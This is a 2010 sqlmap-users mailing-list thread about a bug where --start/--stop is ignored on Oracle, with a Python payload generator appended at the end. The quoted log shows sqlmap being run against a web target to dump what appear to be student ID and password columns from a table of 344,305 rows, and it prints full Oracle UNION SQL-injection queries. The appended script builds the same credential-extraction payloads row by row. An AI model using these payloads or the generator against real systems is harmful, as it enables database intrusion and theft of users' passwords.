Re: [sqlmap-users] Bug(?) with --start/stop in oracle(maybe others)
From: Miroslav S. <mir...@gm...> - 2010-04-26 18:38:16
Hi. Sorry, my fault. Bernardo said that he knows where to look for this one, so he'll try to solve it soon.

Kind regards.

On Mon, Apr 26, 2010 at 6:42 PM, David Guimaraes <sk...@gm...> wrote:
> Miroslav:
>
> It doesn't work even when passing --start 1 or --start 3 or anything on a table with X rows. I don't know if this is an Oracle error or something else; sqlmap simply ignores the parameter. Tested and re-tested: if the table has 100 rows and I pass --start to it to read until the tenth, it will read them all.
>
> On Mon, Apr 26, 2010 at 6:27 AM, Bernardo Damele A. G. <ber...@gm...> wrote:
>> Did you try without providing --start and --stop? Please let me know whether it correctly dumps entries or not.
>>
>> Bernardo
>>
>> On Sat, Apr 24, 2010 at 04:02, David Guimaraes <sk...@gm...> wrote:
>>> Syntax that had problems:
>>>
>>> $ ./sqlmap.py -u "http://www.vuln.com/vuln.asp?a=000408092&b=" -p a --union-use -T ALU_ALUNOS --dump -C "ALU_RA,ALU_SENHA" --start 0 --stop 4 -v 2
>>>
>>> sqlmap/0.9-dev - automatic SQL injection and database takeover tool
>>> http://sqlmap.sourceforge.net
>>>
>>> [*] starting at: 22:52:50
>>>
>>> [22:52:50] [DEBUG] initializing the configuration
>>> [22:52:50] [DEBUG] initializing the knowledge base
>>> [22:52:50] [DEBUG] cleaning up configuration parameters
>>> [22:52:50] [DEBUG] setting the HTTP timeout
>>> [22:52:50] [DEBUG] setting the HTTP method to GET
>>> [22:52:50] [DEBUG] creating HTTP requests opener object
>>> [22:52:50] [DEBUG] parsing XML queries file
>>> [22:52:50] [INFO] using '/path/session' as session file
>>> [22:52:50] [INFO] resuming injection point 'GET' from session file
>>> [22:52:50] [INFO] resuming injection parameter 'a' from session file
>>> [22:52:50] [INFO] resuming injection type 'stringsingle' from session file
>>> [22:52:50] [INFO] resuming 0 number of parenthesis from session file
>>> [22:52:50] [INFO] resuming back-end DBMS 'oracle' from session file
>>> [22:52:50] [INFO] resuming union comment '--' from session file
>>> [22:52:50] [INFO] resuming union count 15 from session file
>>> [22:52:50] [INFO] resuming union position 1 from session file
>>> [22:52:50] [INFO] resuming union false condition 1 from session file
>>> [22:52:50] [INFO] testing connection to the target url
>>> [22:52:50] [DEBUG] got HTTP error code: 500
>>> [22:52:50] [WARNING] the testable parameter 'a' you provided is not into the Cookie
>>> [22:52:50] [INFO] testing for parenthesis on injectable parameter
>>> [22:52:50] [DEBUG] skipping test for MySQL
>>> [22:52:50] [INFO] the back-end DBMS is Oracle
>>> web server operating system: Windows 2000
>>> web application technology: ASP.NET, Microsoft IIS 6.0, ASP
>>> back-end DBMS: Oracle
>>>
>>> [22:52:50] [WARNING] on Oracle it is only possible to enumerate if you provide a TABLESPACE_NAME as database name. sqlmap is going to use 'USERS' as database name
>>> [22:52:50] [INFO] fetching columns 'ALU_RA, ALU_SENHA' entries for table 'ALU_ALUNOS' on database 'USERS'
>>> [22:52:50] [INFO] the SQL query provided has more than a field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are in front of a partial inband sql injection
>>> [22:52:50] [INFO] read from file '/path': 344305
>>> [22:52:50] [DEBUG] query: ' UNION ALL SELECT NULL, CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(COUNT(ALU_RA) AS VARCHAR(4000)), CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM ALU_ALUNOS-- AND 'RFOj'='RFOj
>>> [22:52:51] [DEBUG] performed 1 queries in 0 seconds
>>> [22:52:51] [INFO] the SQL query provided returns 344305 entries
>>> [22:52:51] [DEBUG] query: ' UNION ALL SELECT NULL, CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA AS VARCHAR(4000)), CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA AS VARCHAR(4000)), CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE LIMIT=1-- AND 'qGli'='qGli
>>> [22:52:51] [DEBUG] performed 2 queries in 0 seconds
>>> [22:52:51] [DEBUG] query: ' UNION ALL SELECT NULL, CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA AS VARCHAR(4000)), CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA AS VARCHAR(4000)), CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE LIMIT=2-- AND 'EXyf'='EXyf
>>> [22:52:53] [DEBUG] performed 3 queries in 1 seconds
>>> [22:52:53] [DEBUG] query: ' UNION ALL SELECT NULL, CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA AS VARCHAR(4000)), CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA AS VARCHAR(4000)), CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE LIMIT=3-- AND 'CLyw'='CLyw
>>> [22:52:56] [DEBUG] performed 4 queries in 2 seconds
>>> [22:52:56] [DEBUG] query: ' UNION ALL SELECT NULL, CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA AS VARCHAR(4000)), CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA AS VARCHAR(4000)), CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE LIMIT=4-- AND 'nHQn'='nHQn
>>> [22:52:57] [DEBUG] performed 5 queries in 0 seconds
>>> [22:52:57] [DEBUG] query: ' UNION ALL SELECT NULL, CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA AS VARCHAR(4000)), CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA AS VARCHAR(4000)), CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE LIMIT=5-- AND 'iNmX'='iNmX
>>> [22:52:58] [DEBUG] performed 6 queries in 1 seconds
>>> [22:52:58] [DEBUG] query: ' UNION ALL SELECT NULL, CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA AS VARCHAR(4000)), CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA AS VARCHAR(4000)), CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE LIMIT=6-- AND 'mVQM'='mVQM
>>> [22:52:58] [DEBUG] performed 7 queries in 0 seconds
>>> [22:52:58] [DEBUG] query: ' UNION ALL SELECT NULL, CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA AS VARCHAR(4000)), CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA AS VARCHAR(4000)), CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE LIMIT=7-- AND 'FuqF'='FuqF
>>> [22:52:59] [DEBUG] performed 8 queries in 0 seconds
>>> [22:52:59] [DEBUG] query: ' UNION ALL SELECT NULL, CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA AS VARCHAR(4000)), CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA AS VARCHAR(4000)), CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE LIMIT=8-- AND 'utPd'='utPd
>>> [22:53:01] [DEBUG] performed 9 queries in 2 seconds
>>> [22:53:01] [DEBUG] query: ' UNION ALL SELECT NULL, CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA AS VARCHAR(4000)), CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA AS VARCHAR(4000)), CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE LIMIT=9-- AND 'ilBw'='ilBw
>>> [22:53:03] [DEBUG] performed 10 queries in 2 seconds
>>> [22:53:03] [DEBUG] query: ' UNION ALL SELECT NULL, CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA AS VARCHAR(4000)), CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA AS VARCHAR(4000)), CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE LIMIT=10-- AND 'YxAK'='YxAK
>>> ^C
>>> [22:53:04] [ERROR] user aborted
>>>
>>> [*] shutting down at: 22:53:04
>>>
>>> As you can see, it does not stop querying at the fourth row; it ignores the parameters passed in ("--start" and "--stop").
>>>
>>> I hit Ctrl+C at the tenth query.
>>>
>>> Am I doing something wrong, or is it like this anyway?
>>>
>>> $ svn info
>>> Path: .
>>> URL: https://svn.sqlmap.org/sqlmap/trunk/sqlmap
>>> Repository Root: https://svn.sqlmap.org/sqlmap
>>> Repository UUID: 7eb2e9d7-d917-0410-b3c8-b11144ad09fb
>>> Revision: 1588
>>> Node Kind: directory
>>> Schedule: normal
>>> Last Changed Author: inquisb
>>> Last Changed Rev: 1588
>>> Last Changed Date: 2010-04-23 13:34:20 -0300 (Fri, 23 Apr 2010)
>>>
>>> --
>>> David Gomes Guimarães
>>>
>>> _______________________________________________
>>> sqlmap-users mailing list
>>> sql...@li...
>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>> --
>> Bernardo Damele A. G.
>>
>> E-mail / Jabber: bernardo.damele (at) gmail.com
>> Mobile: +447788962949 (UK 07788962949)
>> PGP Key ID: 0x05F5A30F
>
> --
> David Gomes Guimarães

--
Miroslav Stampar
E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
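The queries in the log pull one row per request by materialising ROWNUM inside a subquery (ROWNUM AS LIMIT) and filtering on that alias, and the complaint is that the loop walks LIMIT=1, 2, 3, ... past the window given with --start/--stop. The Python below is an added illustration written for this page, not sqlmap's own code: it rebuilds that Oracle payload shape and shows where the --start/--stop window has to clip the row loop. The marker strings, the union column count (15) and position (1) are taken from the log; the table and column names are passed in by the caller, the trailing random-tag closer (AND 'x'='x) is left out, and --start/--stop are assumed to be 1-based and inclusive, with 0 meaning unbounded.

```python
"""Oracle row-by-row UNION dump payloads with a --start/--stop window.

Added illustration for this thread, not code from sqlmap. It reproduces the
shape of the queries in the log (ROWNUM aliased inside a subquery, one
request per row, NULL padding to the detected column count) and clips the
row loop to the requested window, which the report says sqlmap did not do.
"""
from typing import List


def chr_encode(marker: str) -> str:
    """Encode a marker as an Oracle CHR() concatenation so no quotes are needed."""
    return "||".join(f"CHR({ord(c)})" for c in marker)


def count_query(table: str, column: str, union_count: int = 15,
                position: int = 1, prefix: str = "iMSFxJ",
                suffix: str = "MkRkjc") -> str:
    """UNION payload returning the row count of `table` between two markers."""
    expr = (f"{chr_encode(prefix)}||NVL(CAST(COUNT({column}) AS VARCHAR(4000)), "
            f"CHR(32))||{chr_encode(suffix)}")
    slots = ["NULL"] * union_count
    slots[position] = expr
    return f"' UNION ALL SELECT {', '.join(slots)} FROM {table}-- "


def row_query(table: str, columns: List[str], row: int, union_count: int = 15,
              position: int = 1, prefix: str = "iMSFxJ", sep: str = "aFOQFT",
              suffix: str = "MkRkjc") -> str:
    """UNION payload returning exactly the `row`-th row (1-based).

    ROWNUM is assigned while rows are produced, so `WHERE ROWNUM = 5` on the
    base table never matches anything; the number has to be materialised in a
    subquery and filtered through its alias, which is what the log shows.
    """
    if row < 1:
        raise ValueError("Oracle ROWNUM starts at 1")
    fields = [f"NVL(CAST({c} AS VARCHAR(4000)), CHR(32))" for c in columns]
    expr = (chr_encode(prefix) + "||"
            + f"||{chr_encode(sep)}||".join(fields)
            + "||" + chr_encode(suffix))
    slots = ["NULL"] * union_count
    slots[position] = expr
    cols = ", ".join(columns)
    return (f"' UNION ALL SELECT {', '.join(slots)} "
            f"FROM (SELECT {cols}, ROWNUM AS LIMIT FROM {table}) WHERE LIMIT={row}-- ")


def window(count: int, start: int = 0, stop: int = 0) -> range:
    """1-based inclusive row range selected by --start/--stop.

    Assumption for this example: 0 means 'unbounded' on either side, and the
    window is clipped to the row count returned by the count query.
    """
    first = max(start, 1)
    last = count if stop <= 0 else min(stop, count)
    return range(first, last + 1)


def dump_queries(table: str, columns: List[str], count: int,
                 start: int = 0, stop: int = 0) -> List[str]:
    """Per-row payloads for the requested window only.

    With --start 0 --stop 4 this yields LIMIT=1..4 and stops; the log shows
    the loop continuing to LIMIT=10 and beyond until Ctrl+C.
    """
    return [row_query(table, columns, i) for i in window(count, start, stop)]


if __name__ == "__main__":
    # Constructed example input: the table and columns named in the log, with
    # the row count the count query reported there.
    print(count_query("ALU_ALUNOS", "ALU_RA"))
    for q in dump_queries("ALU_ALUNOS", ["ALU_RA", "ALU_SENHA"], 344305,
                          start=0, stop=4):
        print(q)
```

Run stand-alone it prints the count payload followed by exactly four row payloads, LIMIT=1 through LIMIT=4, which is the behaviour the report expected from `--start 0 --stop 4`. Clipping the range once, before the loop, rather than checking inside the request loop is the simplest way to make the window impossible to skip.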